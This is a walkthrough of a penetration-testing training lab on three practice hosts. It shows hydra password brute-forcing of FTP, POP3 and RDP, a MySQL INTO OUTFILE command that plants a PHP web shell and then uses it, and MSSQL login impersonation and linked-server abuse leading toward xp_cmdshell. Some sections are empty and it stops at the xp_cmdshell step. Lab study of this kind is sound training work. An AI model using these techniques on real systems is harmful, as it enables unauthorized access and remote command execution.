Uploaded by: Truong Quang Anh

Attack Common Services

Easy Lab
We were commissioned by the company Inlanefreight to conduct a penetration test against three
different hosts to check the servers' configuration and security. We were informed that a flag had been
placed somewhere on each server to prove successful access. These flags have the following format:
• HTB{...}
Our task is to review the security of each of the three servers and present it to the customer. According
to our information, the first server is a server that manages emails, customers, and their files.

Step 1: Scanning the target to identify the services running on it

Nmap scanning command:


┌──(root㉿kali)-[~/Desktop]
└─# nmap -sV -sC -p- -v 10.129.203.7
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-25 10:52 EDT
<SNIP…>
Discovered open port 3389/tcp on 10.129.203.7
Discovered open port 21/tcp on 10.129.203.7
Discovered open port 25/tcp on 10.129.203.7
Discovered open port 443/tcp on 10.129.203.7
Discovered open port 587/tcp on 10.129.203.7
Discovered open port 3306/tcp on 10.129.203.7
Discovered open port 80/tcp on 10.129.203.7
<SNIP…>
PORT STATE SERVICE VERSION
21/tcp open ftp
| fingerprint-strings:
| GenericLines:
| 220 Core FTP Server Version 2.0, build 725, 64-bit Unregistered
| Command unknown, not supported or not allowed...
| Command unknown, not supported or not allowed...
| NULL, SMBProgNeg:
|_ 220 Core FTP Server Version 2.0, build 725, 64-bit Unregistered
| ssl-cert: Subject: commonName=Test/organizationName=Testing/stateOrProvinceName=FL/countryName=US
| Issuer: commonName=Test/organizationName=Testing/stateOrProvinceName=FL/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: shaWithRSAEncryption
| Not valid before: 2022-04-21T19:27:17
| Not valid after: 2032-04-18T19:27:17
| MD5: 27ed 2da8 8b25 57e3 d2fc c0c8 9f0b 55b0
|_SHA-1: 5018 d8d5 ba6b 5a1c 8df6 5969 45d7 fe06 3d32 7fad
|_ssl-date: 2022-09-25T15:04:20+00:00; +1s from scanner time.
25/tcp open smtp hMailServer smtpd
| smtp-commands: WIN-EASY, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp open http Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/7.4.29)
|_http-favicon: Unknown favicon MD5: 56F7C04657931F2D0B79371B2D6E9820
| http-title: Welcome to XAMPP
|_Requested resource was http://10.129.203.7/dashboard/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
443/tcp open ssl/https Core FTP HTTPS Server
| ssl-cert: Subject: commonName=Test/organizationName=Testing/stateOrProvinceName=FL/countryName=US
| Issuer: commonName=Test/organizationName=Testing/stateOrProvinceName=FL/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: shaWithRSAEncryption
| Not valid before: 2022-04-21T19:27:17
| Not valid after: 2032-04-18T19:27:17
| MD5: 27ed 2da8 8b25 57e3 d2fc c0c8 9f0b 55b0
|_SHA-1: 5018 d8d5 ba6b 5a1c 8df6 5969 45d7 fe06 3d32 7fad
|_http-server-header: Core FTP HTTPS Server
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 401 Unauthorized
| Date:Sun, 25 Aug 2022 15:03:49 GMT
| Server: Core FTP HTTPS Server
| Connection: close
| WWW-Authenticate: Basic realm="Restricted Area"
| Content-Type: text/html
| Content-length: 61
| <BODY>
| <HTML>
| HTTP/1.1 401 Unauthorized
| </BODY>
| </HTML>
| HTTPOptions:
|_ Command Not Recognized
|_ssl-date: 2022-09-25T15:04:20+00:00; +1s from scanner time.
587/tcp open smtp hMailServer smtpd
| smtp-commands: WIN-EASY, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
3306/tcp open mysql MySQL 5.5.5-10.4.24-MariaDB
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.4.24-MariaDB
| Thread ID: 11
| Capabilities flags: 63486
| Some Capabilities: FoundRows, SupportsCompression, DontAllowDatabaseTableColumn,
ConnectWithDatabase, Support41Auth, SupportsLoadDataLocal, Speaks41ProtocolOld,
SupportsTransactions, IgnoreSigpipes, InteractiveClient, IgnoreSpaceBeforeParenthesis,
Speaks41ProtocolNew, ODBCClient, LongColumnFlag, SupportsAuthPlugins, SupportsMultipleResults,
SupportsMultipleStatments
| Status: Autocommit
| Salt: z~,Zb\)VV+r#OFO<}"/f
|_ Auth Plugin Name: mysql_native_password
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=WIN-EASY
| Issuer: commonName=WIN-EASY
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-09-24T14:50:53
| Not valid after: 2023-03-26T14:50:53
| MD5: 8db9 a993 1b53 8520 ea59 2236 83b2 cb78
|_SHA-1: 8620 9311 72ab b6fb 8014 6beb 092e b445 a9ec d768
| rdp-ntlm-info:
| Target_Name: WIN-EASY
| NetBIOS_Domain_Name: WIN-EASY
| NetBIOS_Computer_Name: WIN-EASY
| DNS_Domain_Name: WIN-EASY
| DNS_Computer_Name: WIN-EASY
| Product_Version: 10.0.17763
|_ System_Time: 2022-09-25T15:03:55+00:00
|_ssl-date: 2022-09-25T15:04:19+00:00; +1s from scanner time.
<SNIP…>

Reviewing the Nmap report, the common services on this host are:
FTP: 21 (Core FTP Server 2.0)
SMTP: 25, 587 (hMailServer)
Web service: 80 (Apache/XAMPP), 443 (Core FTP HTTPS Server)
MySQL: 3306 (MariaDB 10.4.24)
RDP: 3389

Every one of them needs credentials: FTP, MySQL, RDP and SMTP all require a login, and the HTTPS front end on port 443 answers every request with 401 and a Basic-auth challenge. The XAMPP dashboard on port 80 is the only thing reachable without one, and so far we have no credentials at all.
Before guessing, we ran Nmap again against just the open ports with -vv. At that verbosity the ssl-cert script prints the whole certificate rather than only its fingerprints, and certificate subjects often carry names and e-mail addresses that the short form drops.
┌──(root㉿kali)-[~/Desktop]
└─# nmap -sV -sC -p21,25,80,443,587,3306,3389 -vv 10.129.203.7
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-25 11:10 EDT
<SNIP…>
<SNIP…>
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 127
| fingerprint-strings:
| GenericLines:
| 220 Core FTP Server Version 2.0, build 725, 64-bit Unregistered
| Command unknown, not supported or not allowed...
| Command unknown, not supported or not allowed...
| NULL, SMBProgNeg:
|_ 220 Core FTP Server Version 2.0, build 725, 64-bit Unregistered
| ssl-cert: Subject: commonName=Test/organizationName=Testing/stateOrProvinceName=FL/countryName=US/organizationalUnitName=Test/emailAddress=fiona@inlanefreight.htb/localityName=test
| Issuer: commonName=Test/organizationName=Testing/stateOrProvinceName=FL/countryName=US/organizationalUnitName=Test/emailAddress=fiona@inlanefreight.htb/localityName=test
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: shaWithRSAEncryption
| Not valid before: 2022-04-21T19:27:17
| Not valid after: 2032-04-18T19:27:17
| MD5: 27ed 2da8 8b25 57e3 d2fc c0c8 9f0b 55b0
| SHA-1: 5018 d8d5 ba6b 5a1c 8df6 5969 45d7 fe06 3d32 7fad
| -----BEGIN CERTIFICATE-----
| MIIDcDCCAlwCAQAwCQYFKw4DAg8FADCBgTELMAkGA1UEBhMCVVMxCzAJBgNVBAgM
| AkZMMQ0wCwYDVQQHDAR0ZXN0MQ0wCwYDVQQLDARUZXN0MRAwDgYDVQQKDAdUZXN0
| aW5nMSYwJAYJKoZIhvcNAQkBFhdmaW9uYUBpbmxhbmVmcmVpZ2h0Lmh0YjENMAsG
| A1UEAwwEVGVzdDAeFw0yMjA0MjExOTI3MTdaFw0zMjA0MTgxOTI3MTdaMIGBMQsw
| CQYDVQQGEwJVUzELMAkGA1UECAwCRkwxDTALBgNVBAcMBHRlc3QxDTALBgNVBAsM
| BFRlc3QxEDAOBgNVBAoMB1Rlc3RpbmcxJjAkBgkqhkiG9w0BCQEWF2Zpb25hQGlu
| bGFuZWZyZWlnaHQuaHRiMQ0wCwYDVQQDDARUZXN0MIIBIjANBgkqhkiG9w0BAQEF
| AAOCAQ8AMIIBCgKCAQEAyIqPoz6lLLrXPxHA5semtXjj1FLwBoVdRksIyqeoRyEU
| pCvY9sxLnJr4KPEF0joEmcJbpiOCyx+SuiTtLVS6CUhKAglBv/M1QZmI20JZGSyf
| 8d36rPVc2ZFO4uV/6LVLVtAsVKbBgVJXOv2eJRv/xoqXgvP1EdsbdlmktY7TDaro
| 0xHfvZkqbW0mNSYAOww15GG9U5QHOSJbIZ7pomWSF4MRX7Yd3OjHs5xWdrkBoCeZ
| mMZk4BvjKpxkKhgYaggeg/GhghpE2+JZebHdwUg/z9jhikb/FpSYTFr0vtwXj0AJ
| nlzYPR18j1QoBrgxGzaj4b1vbDA4mH9xcVHE3WMqeQIDAQABMAkGBSsOAwIPBQAD
| ggEBAAW5SJCbcVLWsC9PisIna5EYiIVAOj1fpFpa2n6qWr9ibivs3DEZq0BsiH0O
| +VQsWhwzL9RZOzPCK19/12+D44H4+Zyx0/yUi7XwCZ/3n6WkG49FDi3gNpEO8+QX
| rq5E2ZCoEsyrtl4cNgKr12oibHd/FsH2nViymh2yJZpnVkfCTGCYnbURiiSjQXgx
| 4a8XlM4exqEEYC1hfwUCWRytfdS4yybZ3rDTVJDsQFMxUT++NTIayPnlDLA298xZ
| KuXOTzuf6pjUC5EMkncqdec8o4cVO1t4WJCs0iMaKH6tCB3oY80cYK0Z1PzQzYjz
| W5IEUFA9sdz67h79xdQcQHPHZmM=
|_-----END CERTIFICATE-----
|_ssl-date: 2022-09-25T15:11:46+00:00; +1s from scanner time.
25/tcp open smtp syn-ack ttl 127 hMailServer smtpd
| smtp-commands: WIN-EASY, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp open http syn-ack ttl 127 Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/7.4.29)
| http-title: Welcome to XAMPP
|_Requested resource was http://10.129.203.7/dashboard/
|_http-favicon: Unknown favicon MD5: 56F7C04657931F2D0B79371B2D6E9820
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
443/tcp open ssl/https syn-ack ttl 127 Core FTP HTTPS Server
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 401 Unauthorized
| Date:Sun, 25 Aug 2022 15:11:11 GMT
| Server: Core FTP HTTPS Server
| Connection: close
| WWW-Authenticate: Basic realm="Restricted Area"
| Content-Type: text/html
| Content-length: 61
| <BODY>
| <HTML>
| HTTP/1.1 401 Unauthorized
| </BODY>
|_ </HTML>
| ssl-cert: Subject: commonName=Test/organizationName=Testing/stateOrProvinceName=FL/countryName=US/organizationalUnitName=Test/emailAddress=fiona@inlanefreight.htb/localityName=test
| Issuer: commonName=Test/organizationName=Testing/stateOrProvinceName=FL/countryName=US/organizationalUnitName=Test/emailAddress=fiona@inlanefreight.htb/localityName=test
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: shaWithRSAEncryption
| Not valid before: 2022-04-21T19:27:17
| Not valid after: 2032-04-18T19:27:17
| MD5: 27ed 2da8 8b25 57e3 d2fc c0c8 9f0b 55b0
| SHA-1: 5018 d8d5 ba6b 5a1c 8df6 5969 45d7 fe06 3d32 7fad
| -----BEGIN CERTIFICATE-----
| MIIDcDCCAlwCAQAwCQYFKw4DAg8FADCBgTELMAkGA1UEBhMCVVMxCzAJBgNVBAgM
| AkZMMQ0wCwYDVQQHDAR0ZXN0MQ0wCwYDVQQLDARUZXN0MRAwDgYDVQQKDAdUZXN0
| aW5nMSYwJAYJKoZIhvcNAQkBFhdmaW9uYUBpbmxhbmVmcmVpZ2h0Lmh0YjENMAsG
| A1UEAwwEVGVzdDAeFw0yMjA0MjExOTI3MTdaFw0zMjA0MTgxOTI3MTdaMIGBMQsw
| CQYDVQQGEwJVUzELMAkGA1UECAwCRkwxDTALBgNVBAcMBHRlc3QxDTALBgNVBAsM
| BFRlc3QxEDAOBgNVBAoMB1Rlc3RpbmcxJjAkBgkqhkiG9w0BCQEWF2Zpb25hQGlu
| bGFuZWZyZWlnaHQuaHRiMQ0wCwYDVQQDDARUZXN0MIIBIjANBgkqhkiG9w0BAQEF
| AAOCAQ8AMIIBCgKCAQEAyIqPoz6lLLrXPxHA5semtXjj1FLwBoVdRksIyqeoRyEU
| pCvY9sxLnJr4KPEF0joEmcJbpiOCyx+SuiTtLVS6CUhKAglBv/M1QZmI20JZGSyf
| 8d36rPVc2ZFO4uV/6LVLVtAsVKbBgVJXOv2eJRv/xoqXgvP1EdsbdlmktY7TDaro
| 0xHfvZkqbW0mNSYAOww15GG9U5QHOSJbIZ7pomWSF4MRX7Yd3OjHs5xWdrkBoCeZ
| mMZk4BvjKpxkKhgYaggeg/GhghpE2+JZebHdwUg/z9jhikb/FpSYTFr0vtwXj0AJ
| nlzYPR18j1QoBrgxGzaj4b1vbDA4mH9xcVHE3WMqeQIDAQABMAkGBSsOAwIPBQAD
| ggEBAAW5SJCbcVLWsC9PisIna5EYiIVAOj1fpFpa2n6qWr9ibivs3DEZq0BsiH0O
| +VQsWhwzL9RZOzPCK19/12+D44H4+Zyx0/yUi7XwCZ/3n6WkG49FDi3gNpEO8+QX
| rq5E2ZCoEsyrtl4cNgKr12oibHd/FsH2nViymh2yJZpnVkfCTGCYnbURiiSjQXgx
| 4a8XlM4exqEEYC1hfwUCWRytfdS4yybZ3rDTVJDsQFMxUT++NTIayPnlDLA298xZ
| KuXOTzuf6pjUC5EMkncqdec8o4cVO1t4WJCs0iMaKH6tCB3oY80cYK0Z1PzQzYjz
| W5IEUFA9sdz67h79xdQcQHPHZmM=
|_-----END CERTIFICATE-----
| http-methods:
|_ Supported Methods: POST
|_ssl-date: 2022-09-25T15:11:45+00:00; +1s from scanner time.
|_http-server-header: Core FTP HTTPS Server
587/tcp open smtp syn-ack ttl 127 hMailServer smtpd
| smtp-commands: WIN-EASY, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
3306/tcp open mysql syn-ack ttl 127 MySQL 5.5.5-10.4.24-MariaDB
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.4.24-MariaDB
| Thread ID: 29
| Capabilities flags: 63486
| Some Capabilities: ConnectWithDatabase, InteractiveClient, Support41Auth, SupportsTransactions,
FoundRows, Speaks41ProtocolNew, Speaks41ProtocolOld, IgnoreSigpipes, ODBCClient,
DontAllowDatabaseTableColumn, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal,
SupportsCompression, LongColumnFlag, SupportsMultipleResults, SupportsMultipleStatments,
SupportsAuthPlugins
| Status: Autocommit
| Salt: .(zSlIeDa=I:&M3T0/<"
|_ Auth Plugin Name: mysql_native_password
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| ssl-cert: Subject: commonName=WIN-EASY
| Issuer: commonName=WIN-EASY
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-09-24T14:50:53
| Not valid after: 2023-03-26T14:50:53
| MD5: 8db9 a993 1b53 8520 ea59 2236 83b2 cb78
| SHA-1: 8620 9311 72ab b6fb 8014 6beb 092e b445 a9ec d768
| -----BEGIN CERTIFICATE-----
| MIIC1DCCAbygAwIBAgIQGTcF9W9D1aBEE8F+QQrLQjANBgkqhkiG9w0BAQsFADAT
| MREwDwYDVQQDEwhXSU4tRUFTWTAeFw0yMjA5MjQxNDUwNTNaFw0yMzAzMjYxNDUw
| NTNaMBMxETAPBgNVBAMTCFdJTi1FQVNZMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8A
| MIIBCgKCAQEA1XBNciOHpyTRabHT4BBYJwCM5+mKKZMLxBDqqyyp1bqAJjWZD/4T
| 9KXsSlVN2uRtkWBmneFMHEC3LXzf9WQDZv3BOUrCrUAMFA/YrftMJfiipBlg0KI7
| rUltSGsgca1aunRKkHWa1giNSeVcXi9+zP+2ge7k3r6kf5iuCwHQ0rJ+WWmrspKk
| ZKgJ0Vmhnx8Zx7d0qHItxvQ6oLQ47UYKlaOVIhuK8Y1DJKGczguLKRMH3C434uMs
| y5RsTMV6wzJNj3oqBWGbJGk0qW0zcWwXa353+ptcyUqMPZyKpmow8ZJOF/JhqcDq
| jvlhV0aqaq1qo9oZ6ISYUdADH1EJb9umyQIDAQABoyQwIjATBgNVHSUEDDAKBggr
| BgEFBQcDATALBgNVHQ8EBAMCBDAwDQYJKoZIhvcNAQELBQADggEBADAg0J+U7lbR
| MFuIGfT/CsqnIJqdrmG9KOJSQTaEkMoJ4rypKJgmaLCqg4lhvV6k9FR58h+WBg9n
| eNkV6xF8amT58ZLqHucVCn/pV3g4+jK4+UI3qP7yiMpGvblChjKRuBIjFFk2dln6
| vXhCUMPIwDxmbfNxMj7cZRoi2sOIyfkr8M0qDJB9q9UpCpzYv4X88qpWE0V15kJQ
| QcaqmcrKEt4zCs0VUfMMwefYg9sMxU43yPhohhVerC4UL6zgY5IC2FHvg2monaTY
| LjYRbHQBiNS0zUpXXREN2dIDxmJuYLuPoOSTfcCCULyCSDsShqFaoP+LyYtvdqBa
| qu7i2rJbuV4=
|_-----END CERTIFICATE-----
| rdp-ntlm-info:
| Target_Name: WIN-EASY
| NetBIOS_Domain_Name: WIN-EASY
| NetBIOS_Computer_Name: WIN-EASY
| DNS_Domain_Name: WIN-EASY
| DNS_Computer_Name: WIN-EASY
| Product_Version: 10.0.17763
|_ System_Time: 2022-09-25T15:11:16+00:00
|_ssl-date: 2022-09-25T15:11:45+00:00; +1s from scanner time.
<SNIP…>

The second scan pays off. The self-signed certificate served on ports 21 and 443 (same MD5 and SHA-1 fingerprints, so it is one certificate) carries emailAddress=fiona@inlanefreight.htb in its subject, which gives us a likely username: fiona.
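Pulling the username out of the certificate is the step worth automating, since the -vv run prints the PEM and any DER-capable parser can read the subject without Nmap's ssl-cert script. The following is an added Python example (not part of the original walkthrough; standard library only): a minimal DER walker that collects the Name attributes of the certificate Nmap printed for port 21 above and returns the e-mail addresses and their local parts as candidate logins. The certificate text is copied from the scan; the function names and the OID table are my own.

```python
import base64
import re

# Certificate exactly as nmap -vv printed it for 10.129.203.7:21 (copied from the scan above).
CORE_FTP_CERT_PEM = """-----BEGIN CERTIFICATE-----
MIIDcDCCAlwCAQAwCQYFKw4DAg8FADCBgTELMAkGA1UEBhMCVVMxCzAJBgNVBAgM
AkZMMQ0wCwYDVQQHDAR0ZXN0MQ0wCwYDVQQLDARUZXN0MRAwDgYDVQQKDAdUZXN0
aW5nMSYwJAYJKoZIhvcNAQkBFhdmaW9uYUBpbmxhbmVmcmVpZ2h0Lmh0YjENMAsG
A1UEAwwEVGVzdDAeFw0yMjA0MjExOTI3MTdaFw0zMjA0MTgxOTI3MTdaMIGBMQsw
CQYDVQQGEwJVUzELMAkGA1UECAwCRkwxDTALBgNVBAcMBHRlc3QxDTALBgNVBAsM
BFRlc3QxEDAOBgNVBAoMB1Rlc3RpbmcxJjAkBgkqhkiG9w0BCQEWF2Zpb25hQGlu
bGFuZWZyZWlnaHQuaHRiMQ0wCwYDVQQDDARUZXN0MIIBIjANBgkqhkiG9w0BAQEF
AAOCAQ8AMIIBCgKCAQEAyIqPoz6lLLrXPxHA5semtXjj1FLwBoVdRksIyqeoRyEU
pCvY9sxLnJr4KPEF0joEmcJbpiOCyx+SuiTtLVS6CUhKAglBv/M1QZmI20JZGSyf
8d36rPVc2ZFO4uV/6LVLVtAsVKbBgVJXOv2eJRv/xoqXgvP1EdsbdlmktY7TDaro
0xHfvZkqbW0mNSYAOww15GG9U5QHOSJbIZ7pomWSF4MRX7Yd3OjHs5xWdrkBoCeZ
mMZk4BvjKpxkKhgYaggeg/GhghpE2+JZebHdwUg/z9jhikb/FpSYTFr0vtwXj0AJ
nlzYPR18j1QoBrgxGzaj4b1vbDA4mH9xcVHE3WMqeQIDAQABMAkGBSsOAwIPBQAD
ggEBAAW5SJCbcVLWsC9PisIna5EYiIVAOj1fpFpa2n6qWr9ibivs3DEZq0BsiH0O
+VQsWhwzL9RZOzPCK19/12+D44H4+Zyx0/yUi7XwCZ/3n6WkG49FDi3gNpEO8+QX
rq5E2ZCoEsyrtl4cNgKr12oibHd/FsH2nViymh2yJZpnVkfCTGCYnbURiiSjQXgx
4a8XlM4exqEEYC1hfwUCWRytfdS4yybZ3rDTVJDsQFMxUT++NTIayPnlDLA298xZ
KuXOTzuf6pjUC5EMkncqdec8o4cVO1t4WJCs0iMaKH6tCB3oY80cYK0Z1PzQzYjz
W5IEUFA9sdz67h79xdQcQHPHZmM=
-----END CERTIFICATE-----"""

# Attribute OIDs that commonly appear in an X.509 Name (RFC 5280; emailAddress is the PKCS #9 one).
OID_NAMES = {
    "2.5.4.3": "commonName",
    "2.5.4.6": "countryName",
    "2.5.4.7": "localityName",
    "2.5.4.8": "stateOrProvinceName",
    "2.5.4.10": "organizationName",
    "2.5.4.11": "organizationalUnitName",
    "1.2.840.113549.1.9.1": "emailAddress",
}

# DER string tags a Name attribute value may use, with the codec to decode each.
STRING_TAGS = {0x0C: "utf-8", 0x13: "ascii", 0x14: "latin-1", 0x16: "ascii", 0x1E: "utf-16-be"}


def read_tlv(buf, pos):
    """Decode one DER tag-length-value at buf[pos]; return (tag, value bytes, next position)."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:  # long form: the low 7 bits give the number of length octets that follow
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def decode_oid(raw):
    """Turn OID content octets into dotted form; the first octet packs the first two arcs."""
    arcs = [raw[0] // 40, raw[0] % 40]
    acc = 0
    for b in raw[1:]:
        acc = (acc << 7) | (b & 0x7F)
        if not b & 0x80:  # last octet of this base-128 arc
            arcs.append(acc)
            acc = 0
    return ".".join(map(str, arcs))


def attribute_pair(seq):
    """If seq is the content of AttributeTypeAndValue ::= SEQUENCE { OID, string }, return (oid, text)."""
    if len(seq) < 4:
        return None
    t1, oid, p1 = read_tlv(seq, 0)
    if t1 != 0x06 or p1 >= len(seq):
        return None
    t2, val, p2 = read_tlv(seq, p1)
    if t2 not in STRING_TAGS or p2 != len(seq):
        return None
    return decode_oid(oid), val.decode(STRING_TAGS[t2], "replace")


def collect_name_attributes(buf, found):
    """Walk every constructed node below buf and collect the (OID, value) pairs of Name attributes."""
    pos = 0
    while pos < len(buf):
        tag, value, pos = read_tlv(buf, pos)
        if not tag & 0x20:  # primitive node (INTEGER, BIT STRING, time, ...): nothing to descend into
            continue
        pair = attribute_pair(value) if tag == 0x30 else None
        if pair:
            found.append(pair)
        else:
            collect_name_attributes(value, found)
    return found


def cert_name_attributes(pem):
    """Return [(attribute name, value)] for issuer and subject, in certificate order."""
    der = base64.b64decode("".join(re.findall(r"^[A-Za-z0-9+/=]+$", pem, re.M)))
    _, certificate, _ = read_tlv(der, 0)  # Certificate ::= SEQUENCE { tbsCertificate, sigAlg, signature }
    _, tbs_certificate, _ = read_tlv(certificate, 0)
    pairs = collect_name_attributes(tbs_certificate, [])
    return [(OID_NAMES.get(oid, oid), text) for oid, text in pairs]


def emails_from_cert(pem):
    return sorted({v for k, v in cert_name_attributes(pem) if k == "emailAddress"})


def usernames_from_cert(pem):
    """Local parts of the e-mail addresses: the candidate logins to hand to hydra."""
    return sorted({e.split("@", 1)[0] for e in emails_from_cert(pem)})


if __name__ == "__main__":
    for name, value in cert_name_attributes(CORE_FTP_CERT_PEM):
        print(f"{name}={value}")
    print("candidate users:", usernames_from_cert(CORE_FTP_CERT_PEM))
```

The walker only descends into constructed nodes, so the RSA key and signature (primitive BIT STRINGs) are skipped rather than misread as nested structures; issuer and subject both contribute attributes, which is why the e-mail appears twice before deduplication. The same code works on a certificate saved with openssl s_client, since it only needs the PEM lines.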

Step 2: Attacking common services

Attacking FTP service:

With a username in hand we can brute force the FTP login for fiona with hydra:
┌──(root㉿kali)-[~/Desktop]
└─# hydra -l fiona -P /usr/share/wordlists/rockyou.txt ftp://10.129.203.7

hydra returns a valid credential:
fiona:987654321

From here on we use fiona's credential to log in to the services.

The same credential opens the Core FTP HTTPS front end on port 443 in a browser, where we downloaded two files. The plain FTP port works just as well from the command line:
┌──(root㉿kali)-[~/Desktop]
└─# ftp 10.129.203.7 21
Reading the files, we learn that the directory C:\xampp\htdocs\ on the target is interesting: it is the web root that the Apache/XAMPP instance on port 80 serves from.

Back to the Nmap report: MySQL on port 3306 accepts fiona's credential too. Enumerating the database and fiona's privileges shows that she may write files through the server (SHOW GRANTS) and that secure_file_priv does not restrict the destination, so SELECT ... INTO OUTFILE can drop a PHP file into the web root C:\xampp\htdocs, which Apache will then execute:

> SHOW DATABASES;
> USE test;
> SHOW GRANTS;
> SHOW VARIABLES LIKE 'secure_file_priv';
> SELECT "<?php echo shell_exec($_GET['cmd']);?>" INTO OUTFILE 'C:/xampp/htdocs/web_shell.php';

Two conditions make this work, and both checks above are there to confirm them: the account needs the FILE privilege (INTO OUTFILE refuses without it), and secure_file_priv must be empty or cover the web root; if it names some other directory the write fails. The MySQL service account on this target evidently also has the filesystem rights to create files in htdocs.

Step 3: Using the webshell

With web_shell.php written to C:\xampp\htdocs through MySQL, we open it via the Apache server on port 80 and pass the command in the cmd parameter, for example http://10.129.203.7/web_shell.php?cmd=whoami, and from there search the host for the flag.
Medium Lab

The second server is an internal server (within the inlanefreight.htb domain) that manages and stores
emails and files and serves as a backup of some of the company's processes. From internal conversations,
we heard that this is used relatively rarely and, in most cases, has only been used for testing purposes so
far.

Step 1: Scanning the target to identify the services running on it

Nmap scanning command:


┌──(root㉿kali)-[~/Desktop]
└─# nmap -sV -sC -p- 10.129.201.127

Reviewing the Nmap report, the common services on this host are:

FTP: 2121, 30021
POP3: 110
POP3S: 995
SSH: 22
DNS: 53

All of these need credentials and the scan gave us none, so the first thing to try is anonymous login on both FTP ports.

Step 2: Attacking common services

Anonymous login to the FTP service on port 2121 fails, but the second FTP service on port 30021 accepts it.
Its directory listing reveals a user, simon; inside simon's folder we downloaded mynotes.txt.

The notes read like a list of passwords, so we used the file as the wordlist for a hydra attack on POP3 with the user simon:
┌──(root㉿kali)-[~/Desktop]
└─# hydra -l simon -P mynotes.txt 10.129.201.127 pop3
The credential we got:
simon:8Ns8j1b!23hs4921smHzwn

Connecting to the POP3 service on port 110 with this credential did not get us anywhere, but the same credential logs in to the FTP service on port 2121, where simon's home contains flag.txt and a .ssh folder.

The credential also works over SSH:


Hard Lab
The third server is another internal server used to manage files and working material, such as forms. In
addition, a database is used on the server, the purpose of which we do not know.

Question: Submit the contents of the flag.txt file on the Administrator Desktop.

Step 1: Scanning the target to identify the services running on it
From the Nmap report, the common services on this host are:
SMB: 139, 445
MSSQL: 1433
RDP: 3389

All of these need credentials and the scan did not give us any, so we have to dig further into the one service that may talk to us without a login: SMB.

Step 2: SMB enumeration

First we ran the Nmap SMB scripts against the host, then listed the shares with smbclient.
Nmap scanning:

The Nmap SMB scripts returned nothing of interest.

For the smbclient tool:

smbclient shows a share named Home, and it accepts a null session (no username or password), so we can enumerate it. The listing reveals another user, john.
Walking every directory on the share, we collected these files:
• random.txt
• creds.txt
• information.txt
• note.txt
• secrets.txt
information.txt is the interesting one:

It points us at the database, and the note describes two things that were set up on it:
• Create a local linked server
• Simulate impersonation.
So we need a login that holds the IMPERSONATE permission on another login, and we need a foothold on the box (RDP) to enumerate further.
We now have password lists (random.txt, creds.txt, secrets.txt) and three usernames (simon, fiona, john) collected from the SMB share.
random.txt, creds.txt and secrets.txt all contain passwords, so we merge them into a single wordlist.

Passwords.txt:
1234567
(DK02ka-dsaldS
Inlanefreight2022
Inlanefreight2022!
TestingDB123
kAkd03SA@#!
48Ns72!bns74@S84NNNSl
SecurePassword!
Password123!
SecureLocationforPasswordsd123!!
(k20ASD10934kadA
KDIlalsa9020$
JT9ads02lasSA@
Kaksd032klasdA#
LKads9kasd0-@

Next we brute force RDP with hydra, one user at a time against the merged list. RDP brute forcing is slow and, on a host with a lockout policy, can lock the accounts we depend on, so a short targeted list like this one is far better than rockyou here.

The first attempt, with fiona:
┌──(root💀kali)-[~/Desktop]
└─# hydra -l fiona -P passwords.txt 10.129.203.10 rdp

hydra finds the right credential, and we can RDP to the target:

┌──(root💀kali)-[~/Desktop]
└─# rdesktop -u fiona -p '48Ns72!bns74@S84NNNSl' 10.129.203.10
On the desktop we can see the local users, which match the names we collected (fiona, john, simon).
With fiona's credential we then connected to MSSQL using sqsh.
The next step is the impersonation the note hinted at: fiona's login can impersonate john.
Step by step:
# Step 1: Impersonate the john login

1> EXECUTE AS LOGIN = 'john'
2> SELECT SYSTEM_USER
3> SELECT IS_SRVROLEMEMBER('sysadmin')
4> go

SELECT SYSTEM_USER confirms the switch, and IS_SRVROLEMEMBER shows whether the impersonated login is sysadmin on this instance.

# Step 2: Identify linked servers in MSSQL

1> SELECT srvname, isremote FROM sysservers
2> go

srvname                  isremote
WINSRV02\SQLEXPRESS      1
LOCAL.TEST.LINKED.SRV    0

isremote = 1 marks a remote server entry, 0 a linked server. LOCAL.TEST.LINKED.SRV is the one from the note; EXECUTE ... AT runs a statement on it under whatever login the link was configured with, so we check who that is and what it can do:

1> EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [LOCAL.TEST.LINKED.SRV]


2> go

# Step 3: xp_cmdshell

